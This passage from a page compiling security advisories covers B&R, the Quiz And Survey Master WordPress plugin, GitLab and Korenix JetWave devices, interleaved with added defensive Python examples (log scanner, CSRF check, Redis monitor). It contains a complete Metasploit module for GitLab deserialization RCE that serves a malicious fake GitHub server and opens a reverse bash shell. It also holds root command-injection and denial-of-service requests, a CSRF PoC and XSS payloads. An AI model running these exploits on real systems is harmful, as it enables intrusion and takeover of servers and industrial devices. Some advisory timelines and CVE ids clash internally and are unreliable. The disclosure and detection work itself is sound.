/>Administrators can deactivate the System Diagnostics Manager in case it is not<br />needed.<br /><br /><br />Advisory URL:<br />-------------<br />https://sec-consult.com/vulnerability-lab/<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />SEC Consult Vulnerability Lab<br /><br />SEC Consult, an Atos company<br />Europe | Asia | North America<br /><br />About SEC Consult Vulnerability Lab<br />The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an<br />Atos company. It ensures the continued knowledge gain of SEC Consult in the<br />field of network and application security to stay ahead of the attacker. 
The<br />SEC Consult Vulnerability Lab supports high-quality penetration testing and<br />the evaluation of new offensive and defensive technologies for our customers.<br />Hence our customers obtain the most current information about vulnerabilities<br />and valid recommendation about the risk profile of new technologies.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Interested to work with the experts of SEC Consult?<br />Send us your application https://sec-consult.com/career/<br /><br />Interested in improving your cyber security with the experts of SEC Consult?<br />Contact our local offices https://sec-consult.com/contact/<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Mail: security-research at sec-consult dot com<br />Web: https://www.sec-consult.com<br />Blog: http://blog.sec-consult.com<br />Twitter: https://twitter.com/sec_consult<br />EOF S. Robertz, G. Hechenberger / @2023<br /><br /></code></pre>
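Until the D4.93 update is deployed, the two SDM endpoints named in the advisory are worth watching in the PLC's web server logs, since a reflected XSS attempt leaves the payload in the request line. The following is an added example, not part of the SEC Consult advisory or of the B&R product, that parses combined-format access log lines, percent-decodes each query parameter (repeatedly, so double encoding does not hide anything) and flags values carrying script or event-handler markers. The log lines are constructed around the two advisory URLs, with 192.0.2.10 standing in for `<PLC-IP>`.

```python
"""Added example (not from the advisory): spotting reflected-XSS probes in web logs.

Assumptions: combined-format access logs from the device's web server; the
sample lines below are constructed around the two SDM endpoints named above.
"""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Markers that have no business in a legitimate SDM query parameter value
XSS_MARKERS = re.compile(
    r"<\s*script|javascript\s*:|<\s*(?:img|svg|iframe)\b|\bon[a-z]+\s*=", re.I
)


def deep_unquote(value: str, rounds: int = 3) -> str:
    """Percent-decodes repeatedly so double-encoded payloads are still visible."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_params(target: str) -> list[tuple[str, str]]:
    """(parameter, decoded value) pairs whose value matches an XSS marker."""
    hits = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        decoded = deep_unquote(value)
        if XSS_MARKERS.search(decoded):
            hits.append((name, decoded))
    return hits


def scan(lines) -> list[dict]:
    """One finding per log line that carries at least one suspicious parameter."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue            # not an access-log line; skip rather than guess
        hits = suspicious_params(m["target"])
        if hits:
            findings.append({
                "ip": m["ip"],
                "path": urlsplit(m["target"]).path,
                "params": hits,
                "status": m["status"],
            })
    return findings


# Constructed sample log: the two advisory URLs, a normal SDM request, and the
# SDM start page, all against a made-up PLC at 192.0.2.10.
SAMPLE_LOG = [
    '192.0.2.77 - - [14/Feb/2023:10:15:02 +0100] "GET /sdm/cgiFileLoop.cgi?service=javascript:alert(document.domain);%2f%2f&type=512&scope=%3Cfile:///etc/passwd%3E&module=Snapshot&option=3 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '192.0.2.77 - - [14/Feb/2023:10:15:09 +0100] "GET /sdm/svg.cgi?type=cpuusage&index=1%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '192.0.2.12 - - [14/Feb/2023:10:16:00 +0100] "GET /sdm/svg.cgi?type=cpuusage&index=1 HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '192.0.2.12 - - [14/Feb/2023:10:16:05 +0100] "GET /sdm/ HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A hit from an address outside the engineering network is the signal to look for; the first advisory URL is caught on its `service` parameter (a `javascript:` URL), the second on `index`, and the two legitimate requests produce no finding.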
<pre><code>RCE Security Advisory<br />https://www.rcesecurity.com<br /><br /><br />1. ADVISORY INFORMATION<br />=======================<br />Product: Quiz And Survey Master<br />Vendor URL: https://wordpress.org/plugins/quiz-master-next/<br />Type: Cross-Site Request Forgery (CSRF) [CWE-352]<br />Date found: 2023-01-13<br />Date published: 2023-02-08<br />CVSSv3 Score: 6.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N)<br />CVE: CVE-2023-0292<br /><br /><br />2. CREDITS<br />==========<br />This vulnerability was discovered and researched by Julien Ahrens from<br />RCE Security.<br /><br /><br />3. VERSIONS AFFECTED<br />====================<br />Quiz And Survey Master 8.0.8 and below<br /><br /><br />4. INTRODUCTION<br />===============<br />Quiz and Survey Master is the easiest WordPress Quiz Plugin which can be used<br />to create engaging content to drive traffic and increase user engagement.<br />Everything from viral quiz, trivia quiz, customer satisfaction surveys to employee<br />surveys. This plugin is the ultimate marketing tool for your website.<br /><br />(from the vendor's homepage)<br /><br /><br />5. VULNERABILITY DETAILS<br />========================<br />The plugin offers the ajax action "qsm_remove_file_fd_question" which is used to<br />delete uploaded media contents from the WordPress instance. However, the<br />functionality is not protected by an anti-CSRF token/nonce.<br /><br />Since there is no anti-CSRF token protecting this functionality, it is vulnerable<br />to Cross-Site Request Forgery attacks allowing an attacker to delete uploaded<br />media contents on behalf of the attacked user.<br /><br />To successfully exploit this vulnerability, a user with the right to access the<br />plugin must be tricked into visiting an arbitrary website while having an<br />authenticated session in the application.<br /><br /><br />6. 
PROOF OF CONCEPT<br />===================<br />The following Proof-of-Concept would delete the uploaded media with the ID "1":<br /><br /><html><br /> <!-- CSRF PoC - generated by Burp Suite Professional --><br /> <body><br /> <script>history.pushState('', '', '/')</script><br /> <form action="http://localhost/wp-admin/admin-ajax.php" method="POST"><br /> <input type="hidden" name="action" value="qsm_remove_file_fd_question" /><br /> <input type="hidden" name="media_id" value="1" /><br /> <input type="submit" value="Submit request" /><br /> </form><br /> </body><br /></html><br /><br /><br />7. SOLUTION<br />===========<br />Update to version 8.0.9<br /><br /><br />8. REPORT TIMELINE<br />==================<br />2023-01-13: Discovery of the vulnerability<br />2023-01-13: Wordfence (responsible CNA) assigns CVE-2023-0291<br />2023-01-18: Sent initial notification to vendor via contact form<br />2022-01-18: Vendor response<br />2022-01-21: Vendor releases version 8.0.9 which fixes the vulnerability<br />2022-02-08: Public disclosure<br /><br /><br />9. REFERENCES<br />=============<br />https://github.com/MrTuxracer/advisories<br /></code></pre>
<pre><code>RCE Security Advisory<br />https://www.rcesecurity.com<br /><br /><br />1. ADVISORY INFORMATION<br />=======================<br />Product: Quiz And Survey Master<br />Vendor URL: https://wordpress.org/plugins/quiz-master-next/<br />Type: Missing Authentication for Critical Function [CWE-306]<br />Date found: 2023-01-13<br />Date published: 2023-02-08<br />CVSSv3 Score: 7.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N)<br />CVE: CVE-2023-0291<br /><br /><br />2. CREDITS<br />==========<br />This vulnerability was discovered and researched by Julien Ahrens from<br />RCE Security.<br /><br /><br />3. VERSIONS AFFECTED<br />====================<br />Quiz And Survey Master 8.0.8 and below<br /><br /><br />4. INTRODUCTION<br />===============<br />Quiz and Survey Master is the easiest WordPress Quiz Plugin which can be used<br />to create engaging content to drive traffic and increase user engagement.<br />Everything from viral quiz, trivia quiz, customer satisfaction surveys to employee<br />surveys. This plugin is the ultimate marketing tool for your website.<br /><br />(from the vendor's homepage)<br /><br /><br />5. VULNERABILITY DETAILS<br />========================<br />The plugin offers the ajax action "qsm_remove_file_fd_question" to unauthenticated<br />users which accepts a "media_id" parameter pointing to any item uploaded through<br />WordPress' media upload functionality. However, this "media_id" is afterwards used<br />in a forced wp_delete_attachment() call, ultimately deleting the media from the<br />WordPress instance.<br /><br />Successful exploits can allow an unauthenticated attacker to delete any (and all)<br />uploaded WordPress media files.<br /><br /><br />6. 
PROOF OF CONCEPT<br />===================<br />The following Proof-of-Concept would delete the uploaded media with the ID "1":<br /><br />POST /wp-admin/admin-ajax.php HTTP/2<br />Host: localhost<br />Upgrade-Insecure-Requests: 1<br />User-Agent: Mozilla/5.0<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-GB,en-US;q=0.9,en;q=0.8<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 44<br /><br />action=qsm_remove_file_fd_question&media_id=1<br /><br /><br />7. SOLUTION<br />===========<br />Update to version 8.0.9<br /><br /><br />8. REPORT TIMELINE<br />==================<br />2023-01-13: Discovery of the vulnerability<br />2023-01-13: Wordfence (responsible CNA) assigns CVE-2023-0291<br />2023-01-18: Sent initial notification to vendor via contact form<br />2022-01-18: Vendor response<br />2022-01-21: Vendor releases version 8.0.9 which fixes the vulnerability<br />2022-02-08: Public disclosure<br /><br /><br />9. REFERENCES<br />=============<br />https://github.com/MrTuxracer/advisories<br /><br /><br />--<br />Mit freundlichen Grüßen / With best regards / Atentamente<br /><br />Julien Ahrens<br />Freelancer | Penetration Tester<br /><br />RCE Security<br />VAT-ID: DE328576638<br />Website: www.rcesecurity.com<br /><br /><br />This e-mail may contain confidential and/or privileged information.<br />If you are not the intended recipient (or have received this e-mail in<br />error) please notify the sender immediately and destroy this e-mail.<br />Any unauthorized copying, disclosure or distribution of the material<br />in this e-mail is strictly forbidden.<br /><br /></code></pre>
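The two Quiz And Survey Master advisories describe the same handler failing two separate checks: it acts for callers who are not logged in at all (CWE-306, CVE-2023-0291) and, for callers who are, it acts on a request no anti-CSRF token ties to their session (CWE-352, CVE-2023-0292). The Demanzo add-staff form earlier on this page is the same CSRF pattern. The following is an added example, not the plugin's or Demanzo's code, of a delete handler that applies the checks in the right order: authenticate, verify a session-bound token, authorise, then act. Session ids, capability names and the media table are constructed for the demo.

```python
"""Added example (not from either advisory): the checks a state-changing AJAX
action needs, shown on a media-delete endpoint like the one described above.

Assumptions: server-side sessions keyed by an opaque id, a per-process secret,
and capability names made up for the demo.
"""
import hashlib
import hmac
import secrets

SECRET_KEY = secrets.token_bytes(32)   # server secret; persisted/rotated in a real deployment

USERS = {"alice": {"delete_media"}, "bob": set()}   # user -> capabilities (constructed)


def new_store() -> dict:
    """Fresh media table for each run (constructed sample data)."""
    return {1: {"owner": "alice", "file": "report.pdf"},
            2: {"owner": "alice", "file": "logo.png"}}


def csrf_token(session_id: str) -> str:
    """Token bound to the session: a cross-site page cannot read or forge it."""
    return hmac.new(SECRET_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def csrf_token_ok(session_id: str, supplied) -> bool:
    return isinstance(supplied, str) and hmac.compare_digest(csrf_token(session_id), supplied)


def handle_remove_media(params: dict, session, store: dict) -> str:
    """Order matters: authenticate, then CSRF, then authorise, then act."""
    if not session or "user" not in session:
        return "401 authentication required"          # the CWE-306 case
    if not csrf_token_ok(session["id"], params.get("_token")):
        return "403 missing or invalid CSRF token"    # the CWE-352 case
    caps = USERS.get(session["user"], set())
    if "delete_media" not in caps:
        return "403 insufficient capability"
    try:
        media_id = int(params.get("media_id", ""))
    except ValueError:
        return "400 bad media_id"
    item = store.get(media_id)
    if item is None:
        return "404 no such media"
    if item["owner"] != session["user"] and "delete_any_media" not in caps:
        return "403 not the owner"
    del store[media_id]
    return "200 deleted"


if __name__ == "__main__":
    store = new_store()
    alice = {"id": "s-alice", "user": "alice"}
    print(handle_remove_media({"media_id": "1"}, None, store))
    print(handle_remove_media({"media_id": "1"}, alice, store))
    print(handle_remove_media({"media_id": "1", "_token": csrf_token("s-alice")}, alice, store))
```

The token is derived from the session id with a server secret, so the page that legitimately renders the delete button can embed it while a third-party page cannot compute it; in WordPress the equivalent pair is a nonce check plus a capability check, and the ordering is the same.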
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> include Msf::Exploit::Git::SmartHttp<br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::Remote::HttpServer<br /> include Msf::Exploit::Remote::HTTP::Gitlab<br /> include Msf::Exploit::RubyDeserialization<br /><br /> attr_accessor :cookie<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'GitLab GitHub Repo Import Deserialization RCE',<br /> 'Description' => %q{<br /> An authenticated user can import a repository from GitHub into GitLab.<br /> If a user attempts to import a repo from an attacker-controlled server,<br /> the server will reply with a Redis serialization protocol object in the nested<br /> `default_branch`. 
GitLab will cache this object and<br /> then deserialize it when trying to load a user session, resulting in RCE.<br /> },<br /> 'Author' => [<br /> 'William Bowling (vakzz)', # discovery<br /> 'Heyder Andrade <https://infosec.exchange/@heyder>', # msf module<br /> 'RedWay Security <https://infosec.exchange/@redway>', # PoC<br /> ],<br /> 'References' => [<br /> ['URL', 'https://hackerone.com/reports/1679624'],<br /> ['URL', 'https://github.com/redwaysecurity/CVEs/tree/main/CVE-2022-2992'], # PoC<br /> ['URL', 'https://gitlab.com/gitlab-org/gitlab/-/issues/371884'],<br /> ['CVE', '2022-2992']<br /> ],<br /> 'DisclosureDate' => '2022-10-06',<br /> 'License' => MSF_LICENSE,<br /> 'Platform' => ['unix', 'linux'],<br /> 'Arch' => [ARCH_CMD],<br /> 'Privileged' => false,<br /> 'Stance' => Msf::Exploit::Stance::Aggressive,<br /> 'Targets' => [<br /> [<br /> 'Unix Command',<br /> {<br /> 'Platform' => 'unix',<br /> 'Arch' => ARCH_CMD,<br /> 'Type' => :unix_cmd,<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'cmd/unix/reverse_bash'<br /> }<br /> }<br /> ]<br /> ],<br /> 'DefaultTarget' => 0,<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [IOC_IN_LOGS]<br /> }<br /> )<br /> )<br /><br /> register_options(<br /> [<br /> OptString.new('USERNAME', [true, 'The username to authenticate as', nil]),<br /> OptString.new('PASSWORD', [true, 'The password for the specified username', nil]),<br /> OptInt.new('IMPORT_DELAY', [true, 'Time to wait from the import task before try to trigger the payload', 5]),<br /> OptAddress.new('URIHOST', [false, 'Host to use in GitHub import URL'])<br /> ]<br /> )<br /> deregister_options('GIT_URI')<br /> end<br /><br /> def group_name<br /> @group_name ||= Rex::Text.rand_text_alpha(8..12)<br /> end<br /><br /> def api_token<br /> @api_token ||= gitlab_create_personal_access_token<br /> end<br /><br /> def session_id<br /> @session_id ||= Rex::Text.rand_text_hex(32)<br /> end<br 
/><br /> def redis_payload(cmd)<br /> serialized_payload = generate_ruby_deserialization_for_command(cmd, :net_writeadapter)<br /> gitlab_session_id = "session:gitlab:#{session_id}"<br /> # A RESP array of 3 elements (https://redis.io/docs/reference/protocol-spec/)<br /> # The command set<br /> # The gitlab session to load the payload from<br /> # The Payload itself. A Ruby serialized command<br /> "*3\r\n$3\r\nset\r\n$#{gitlab_session_id.size}\r\n#{gitlab_session_id}\r\n$#{serialized_payload.size}\r\n#{serialized_payload}"<br /> end<br /><br /> def check<br /> self.cookie = gitlab_sign_in(datastore['USERNAME'], datastore['PASSWORD']) unless cookie<br /><br /> vprint_status('Trying to get the GitLab version')<br /><br /> version = Rex::Version.new(gitlab_version)<br /><br /> return CheckCode::Safe("Detected GitLab version #{version} which is not vulnerable") unless (<br /> version.between?(Rex::Version.new('11.10'), Rex::Version.new('15.1.6')) ||<br /> version.between?(Rex::Version.new('15.2'), Rex::Version.new('15.2.4')) ||<br /> version.between?(Rex::Version.new('15.3'), Rex::Version.new('15.3.2'))<br /> )<br /><br /> report_vuln(<br /> host: rhost,<br /> name: name,<br /> refs: references,<br /> info: [version]<br /> )<br /> return CheckCode::Appears("Detected GitLab version #{version} which is vulnerable.")<br /> rescue Msf::Exploit::Remote::HTTP::Gitlab::Error::AuthenticationError<br /> return CheckCode::Detected('Could not detect the version because authentication failed.')<br /> rescue Msf::Exploit::Remote::HTTP::Gitlab::Error => e<br /> return CheckCode::Unknown("#{e.class} - #{e.message}")<br /> end<br /><br /> def cleanup<br /> super<br /> return unless @import_id<br /><br /> gitlab_delete_group(@group_id, api_token)<br /> gitlab_revoke_personal_access_token(api_token)<br /> gitlab_sign_out<br /> rescue Msf::Exploit::Remote::HTTP::Gitlab::Error => e<br /> print_error("#{e.class} - #{e.message}")<br /> end<br /><br /> def exploit<br /> if 
Rex::Socket.is_internal?(srvhost_addr)<br /> print_warning("#{srvhost_addr} is an internal address and will not work unless the target GitLab instance is using a non-default configuration.")<br /> end<br /><br /> setup_repo_structure<br /> start_service({<br /> 'Uri' => {<br /> 'Proc' => proc do |cli, req|<br /> on_request_uri(cli, req)<br /> end,<br /> 'Path' => '/'<br /> }<br /> })<br /> execute_command(payload.encoded)<br /> rescue Timeout::Error => e<br /> fail_with(Failure::TimeoutExpired, e.message)<br /> end<br /><br /> def execute_command(cmd, _opts = {})<br /> vprint_status("Executing command: #{cmd}")<br /> # due to the AutoCheck mixin and the keep_cookies option, the cookie might be already set<br /> self.cookie = gitlab_sign_in(datastore['USERNAME'], datastore['PASSWORD']) unless cookie<br /> vprint_status("Session ID: #{session_id}")<br /> vprint_status("Creating group #{group_name}")<br /> # We need group id for the cleanup method<br /> @group_id = gitlab_create_group(group_name, api_token)['id']<br /> fail_with(Failure::UnexpectedReply, 'Failed to create a new group') unless @group_id<br /> @redis_payload = redis_payload(cmd)<br /> # import a repository from GitHub<br /> vprint_status('Importing a repository from GitHub')<br /> @import_id = gitlab_import_github_repo(<br /> group_name: group_name,<br /> github_hostname: get_uri,<br /> api_token: api_token<br /> )['id']<br /><br /> fail_with(Failure::UnexpectedReply, 'Failed to import a repository from GitHub') unless @import_id<br /> # wait for the import tasks to finish<br /> select(nil, nil, nil, datastore['IMPORT_DELAY'])<br /> # execute the payload<br /> send_request_cgi({<br /> 'uri' => normalize_uri(target_uri.path, group_name),<br /> 'method' => 'GET',<br /> 'keep_cookies' => false,<br /> 'cookie' => "_gitlab_session=#{session_id}"<br /> })<br /> rescue Msf::Exploit::Remote::HTTP::Gitlab::Error => e<br /> fail_with(Failure::Unknown, "#{e.class} - #{e.message}")<br /> end<br /><br /> def 
setup_repo_structure<br /> blob_object_fname = "#{Rex::Text.rand_text_alpha(5..10)}.txt"<br /> blob_data = Rex::Text.rand_text_alpha(5..12)<br /> blob_object = Msf::Exploit::Git::GitObject.build_blob_object(blob_data)<br /><br /> tree_data =<br /> {<br /> mode: '100644',<br /> file_name: blob_object_fname,<br /> sha1: blob_object.sha1<br /> }<br /> tree_object = Msf::Exploit::Git::GitObject.build_tree_object(tree_data)<br /><br /> commit_obj = Msf::Exploit::Git::GitObject.build_commit_object(tree_sha1: tree_object.sha1)<br /><br /> git_objs = [ commit_obj, tree_object, blob_object ]<br /><br /> @refs =<br /> {<br /> 'HEAD' => 'refs/heads/main',<br /> 'refs/heads/main' => commit_obj.sha1<br /> }<br /> @packfile = Msf::Exploit::Git::Packfile.new('2', git_objs)<br /> end<br /><br /> # Handle incoming requests from GitLab server<br /> def on_request_uri(cli, req)<br /> super<br /> headers = { 'Content-Type' => 'application/json' }<br /> data = {}.to_json<br /> case req.uri<br /> when %r{/api/v3/rate_limit}<br /> headers.merge!({<br /> 'X-RateLimit-Limit' => '100000',<br /> 'X-RateLimit-Remaining' => '100000'<br /> })<br /> when %r{/api/v3/repositories/(\w{1,20})}<br /> id = Regexp.last_match(1)<br /> name = Rex::Text.rand_text_alpha(8..12)<br /> data = {<br /> id: id,<br /> name: name,<br /> full_name: "#{name}/name",<br /> clone_url: "#{get_uri.gsub(%r{/+$}, '')}/#{name}/public.git"<br /> }.to_json<br /> when %r{/\w+/public.git/info/refs}<br /> data = build_pkt_line_advertise(@refs)<br /> headers.merge!({ 'Content-Type' => 'application/x-git-upload-pack-advertisement' })<br /> when %r{/\w+/public.git/git-upload-pack}<br /> data = build_pkt_line_sideband(@packfile)<br /> headers.merge!({ 'Content-Type' => 'application/x-git-upload-pack-result' })<br /> when %r{/api/v3/repos/\w+/\w+}<br /> bytes_size = rand(3..8)<br /> data = {<br /> 'default_branch' => {<br /> 'to_s' => {<br /> 'bytesize' => bytes_size,<br /> 'to_s' => 
"+#{Rex::Text.rand_text_alpha_lower(bytes_size)}\r\n#{@redis_payload}"<br /> # using a simple string format for RESP<br /> }<br /> }<br /> }.to_json<br /> end<br /> send_response(cli, data, headers)<br /> end<br />end<br /></code></pre>
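An added illustration, not part of the Metasploit module above: a small Python RESP decoder that reads a byte stream the way Redis does and flags SET commands against session:gitlab:* keys, which is what a Redis-side monitor would look for when a "branch name" carries CRLF plus a RESP array. The session id and the Marshal blob in the sample stream are constructed placeholders.

```python
SESSION_PREFIX = b"session:gitlab:"
MARSHAL_HEADER = b"\x04\x08"  # Ruby Marshal version bytes that open every dumped session

def _decode_one(data, pos):
    """Decode one RESP frame at data[pos]; return (value, next_pos)."""
    kind, end = data[pos:pos + 1], data.index(b"\r\n", pos)
    line, pos = data[pos + 1:end], end + 2
    if kind == b"+":                          # simple string
        return line.decode(), pos
    if kind == b"$":                          # bulk string: $<len>\r\n<bytes>\r\n
        n = int(line)
        value, pos = data[pos:pos + n], pos + n
        if data[pos:pos + 2] == b"\r\n":      # tolerate a missing trailing CRLF
            pos += 2
        return value, pos
    if kind == b"*":                          # array: *<count>\r\n<frames>
        items = []
        for _ in range(int(line)):
            item, pos = _decode_one(data, pos)
            items.append(item)
        return items, pos
    raise ValueError(f"unsupported RESP type {kind!r}")

def decode_resp(data):
    """Decode every frame in a RESP stream, exactly as a Redis parser would."""
    frames, pos = [], 0
    while pos < len(data):
        value, pos = _decode_one(data, pos)
        frames.append(value)
    return frames

def find_session_writes(frames):
    """Return (key, value) for every SET whose key names a GitLab session."""
    return [(f[1], f[2]) for f in frames
            if isinstance(f, list) and len(f) == 3
            and f[0].lower() == b"set" and f[1].startswith(SESSION_PREFIX)]

def looks_like_marshal(value):
    """True if the written value carries the Marshal header a Ruby session has."""
    return value.startswith(MARSHAL_HEADER)

# Constructed sample stream: a harmless "+main" simple string followed by an
# injected SET, mirroring the "+<branch>\r\n<RESP array>" shape the module builds.
FAKE_SESSION = SESSION_PREFIX + b"ab" * 32
FAKE_BLOB = MARSHAL_HEADER + b"<constructed placeholder, not a real Marshal dump>"
SAMPLE_STREAM = (b"+main\r\n*3\r\n$3\r\nset\r\n$%d\r\n%s\r\n$%d\r\n%s\r\n"
                 % (len(FAKE_SESSION), FAKE_SESSION, len(FAKE_BLOB), FAKE_BLOB))

if __name__ == "__main__":
    for key, value in find_session_writes(decode_resp(SAMPLE_STREAM)):
        print("session write", key, "marshal" if looks_like_marshal(value) else "raw")
```

A legitimate Redis client never emits two top-level frames from one bulk value, so a session-store write that arrives this way, or from a process other than the GitLab session middleware, is the signal to alert on.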
<pre><code>CyberDanube Security Research 20230213-0<br />-------------------------------------------------------------------------------<br />              title| Multiple Vulnerabilities<br />            product| JetWave4221 HP-E, JetWave 2212G, JetWave 2212X/2212S,<br />                   | JetWave 2211C, JetWave 2411/2111, JetWave 2411L/2111L,<br />                   | JetWave 2414/2114, JetWave 2424, JetWave 2460,<br />                   | JetWave 3220/3420 V3<br /> vulnerable version| See "Vulnerable Versions"<br />      fixed version| See "Solution"<br />         CVE number| requested<br />             impact| High<br />           homepage| https://korenix.com/<br />              found| 2022-11-28<br />                 by| S. Dietz, T. Weber (Office Vienna)<br />                   | CyberDanube Security Research<br />                   | Vienna | St. Pölten<br />                   |<br />                   | https://www.cyberdanube.com<br />-------------------------------------------------------------------------------<br /><br /><br />Vendor description<br />-------------------------------------------------------------------------------<br />"Korenix Technology, a Beijer group company within the Industrial Communication<br />business area, is a global leading manufacturer providing innovative,<br />market-oriented, value-focused Industrial Wired and Wireless Networking Solutions.<br />[...]<br />Our products are mainly applied in SMART industries: Surveillance,<br />Machine-to-Machine, Automation, Remote Monitoring, and Transportation.
Worldwide customer base covers different Sales channels, including end-customers,<br />OEMs, system integrators, and brand label partners."<br /><br />Source:<br />https://www.korenix.com/en/about/index.aspx?kind=3<br /><br /><br />Vulnerable Versions<br />-------------------------------------------------------------------------------<br />The following firmware versions have been found to be vulnerable by<br />CyberDanube:<br /> * Korenix JetWave4221 HP-E <= V1.3.0<br /> * Korenix JetWave 3220/3420 V3 < V1.7<br /><br />The following firmware versions have been identified to be vulnerable by the<br />vendor:<br /> * Korenix JetWave 2212G V1.3.T<br /> * Korenix JetWave 2212X/2112S V1.3.0<br /> * Korenix JetWave 2211C < V1.6<br /> * Korenix JetWave 2411/2111 < V1.5<br /> * Korenix JetWave 2411L/2111L < V1.6<br /> * Korenix JetWave 2414/2114 < V1.4<br /> * Korenix JetWave 2424 < V1.3<br /> * Korenix JetWave 2460 < V1.6<br /><br /><br />Vulnerability overview<br />-------------------------------------------------------------------------------<br />1) Authenticated Command Injection<br />The web server of the device is prone to an authenticated command injection.<br />It allows an attacker to gain full access to the underlying operating system of<br />the device, with everything that implies. If such a device is acting as a key<br />device in an industrial network, or controls various critical equipment via<br />serial ports, an attacker can do far more extensive damage in the corresponding<br />network.<br /><br />2) Authenticated Denial of Web-Service<br />When logged in, a user can issue a POST request such that the underlying binary<br />exits.
The Web-Service becomes unavailable and cannot be accessed until the<br />device gets rebooted.<br /><br /><br />Proof of Concept<br />-------------------------------------------------------------------------------<br />1) Authenticated Command Injection<br />1.a)<br />The command "touch /tmp/poc" was injected into the system by using the following<br />POST request:<br />===============================================================================<br />POST /goform/formTFTPLoadSave HTTP/1.1<br />Host: 172.16.0.38<br />User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:107.0) Gecko/20100101 Firefox/107.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 127<br />Origin: http://172.16.0.38<br />Connection: close<br />Referer: http://172.16.0.38/mgmtsaveconf.asp<br />Cookie: -common-web-session-=::webs.session::d7af70f81033cff3828902e476ceda45<br />Upgrade-Insecure-Requests: 1<br /><br />submit-url=%2Fmgmtsaveconf.asp&ip_address=192.168.1.1&file_name=%24%28touch+%2Ftmp%2Fpoc%29&tftp_action=load&tftp_config=Submit<br />===============================================================================<br /><br /><br />The command gets executed as root and a file under the folder /tmp/ is created.<br /><br />1.b)<br />The command "touch /tmp/poc2" was injected into the system by using the following<br />POST request:<br />===============================================================================<br />POST /goform/formSysCmd HTTP/1.1<br />Host: 172.16.0.38<br />Content-Type: application/x-www-form-urlencoded<br />Connection: close<br />Referer: 172.16.0.38<br />Cookie: -common-web-session-=::webs.session::df1307d508d798638a8b4572987462bb<br />Content-Length: 40<br /><br />sysCmd=touch%20/tmp/poc2&submit-url=<br 
/>===============================================================================<br /><br />The command gets executed as root and a file under the folder /tmp/ is created.<br />Command output is written into /tmp/syscmd.<br /><br /><br />2) Authenticated Denial of Web-Service<br />The process goahead crashes when the following POST request is sent to the<br />endpoint /goform/formDefault:<br />===============================================================================<br />POST /goform/formDefault HTTP/1.1<br />Host: 172.16.0.38<br />User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:107.0) Gecko/20100101 Firefox/107.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 62<br />Origin: http://172.16.0.38<br />Connection: close<br />Referer: http://172.16.0.38/toolping.asp<br />Cookie: -common-web-session-=::webs.session::3c624961199904f380e978a3967cc356<br />Upgrade-Insecure-Requests: 1<br /><br />PingIPAddress=127.0.0.1&submit-url=%2Ftoolping.asp&Submit=Ping<br />===============================================================================<br /><br /><br />The output was observed on the terminal using our emulated instance:<br />===============================================================================<br /><br />rm: invalid option -- /<br />BusyBox v1.01 (2022.10.21-00:22+0000) multi-call binary<br />Usage: rm [OPTION]... FILE...<br /><br />Remove (unlink) the FILE(s).
You may use '--' to<br />indicate that all following arguments are non-options.<br /><br />Options:<br />  -i        always prompt before removing each destination<br />  -f        remove existing destinations, never prompt<br />  -r or -R  remove the contents of directories recursively<br /><br />killall: wlwatchdog: no process killed<br />killall: wlapwatchdog: no process killed<br />===============================================================================<br /><br /><br />The vulnerabilities were manually verified on an emulated device by using the<br />MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).<br /><br /><br />Solution<br />-------------------------------------------------------------------------------<br />Owners of these products are advised to update to the following versions:<br /> * Korenix JetWave 4221 HP-E V1.4.0<br /> * Korenix JetWave 2212G V1.10<br /> * Korenix JetWave 2212X/2112S V1.11<br /> * Korenix JetWave 2211C V1.6<br /> * Korenix JetWave 2411/2111 V1.5<br /> * Korenix JetWave 2411L/2111L V1.6<br /> * Korenix JetWave 2414/2114 V1.4<br /> * Korenix JetWave 2424 V1.3<br /> * Korenix JetWave 2460 